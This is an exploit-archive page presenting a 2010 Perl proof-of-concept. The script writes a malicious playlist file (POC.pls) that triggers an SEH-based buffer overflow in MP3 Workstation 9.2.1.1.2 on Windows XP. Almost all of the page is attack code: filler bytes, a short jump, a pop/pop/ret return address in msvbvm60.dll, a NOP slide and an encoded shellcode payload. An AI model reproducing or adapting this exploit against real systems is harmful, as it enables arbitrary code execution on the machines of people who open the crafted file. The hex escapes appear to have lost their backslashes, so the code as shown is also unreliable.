MP3 Workstation Version 9.2.1.1.2 SEH exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : MP3 Workstation Version 9.2.1.1.2 SEH exploit
# Published : 2010-09-15
# Author : sanjeev gupta
# Previous Title : Honestech VHS to DVD <= 3.0.30 Deluxe Local Buffer Overflow (SEH)
# Next Title : A-PDF All to MP3 Converter v.1.1.0 Universal Local SEH Exploit

#MP3 Workstation  Version 9.2.1.1.2  SEH exploit
#Author Sanjeev Gupta san.gupta86[at]gmail.com
#Download Vulnerable application from http://www.e-soft.co.uk/MP3%20Workstation.htm
#Vulnerable version MP3 Workstation  Version 9.2.1.1.2
#Tested on XP SP2
#Greets Puneet Jain



my $head = "x5Bx70x6Cx61x79x6Cx69x73x74x5Dx0Dx0Ax46x69x6Cx65x31x3D";
my $fuck = "x41" x 1940;
my $nseh = "xebx06x90x90";  # short jump
my $seh =  pack('V',0x735275CB);  #0x735275CB msvbvm60.dll   p/p/r 

my $slide = "x90" x 12;
my $code = 
"xDBxDFxD9x74x24xF4x58x2BxC9xB1x33xBA".
"x4CxA8x75x76x83xC0x04x31x50x13x03x1CxBBx97x83x60".
"x53xDEx6Cx98xA4x81xE5x7Dx95x93x92xF6x84x23xD0x5A".
"x25xCFxB4x4ExBExBDx10x61x77x0Bx47x4Cx88xBDx47x02".
"x4AxDFx3Bx58x9Fx3Fx05x93xD2x3Ex42xC9x1Dx12x1Bx86".
"x8Cx83x28xDAx0CxA5xFEx51x2CxDDx7BxA5xD9x57x85xF5".
"x72xE3xCDxEDxF9xABxEDx0Cx2DxA8xD2x47x5Ax1BxA0x56".
"x8Ax55x49x69xF2x3Ax74x46xFFx43xB0x60xE0x31xCAx93".
"x9Dx41x09xEEx79xC7x8Cx48x09x7Fx75x69xDExE6xFEx65".
"xABx6Dx58x69x2AxA1xD2x95xA7x44x35x1CxF3x62x91x45".
"xA7x0Bx80x23x06x33xD2x8BxF7x91x98x39xE3xA0xC2x57".
"xF2x21x79x1ExF4x39x82x30x9Dx08x09xDFxDAx94xD8xA4".
"x05x77xC9xD0xADx2Ex98x59xB0xD0x76x9DxCDx52x73x5D".
"x2Ax4AxF6x58x76xCCxEAx10xE7xB9x0Cx87x08xE8x6Ex46".
"x9Bx70x5FxEDx1Bx12x9F";

my $buf = "x90" x 2805;



my $file = "POC.pls";
open ($File,">$file");
print $File $head.$fuck.$nseh.$seh.$slide.$code.$buf;
close($File);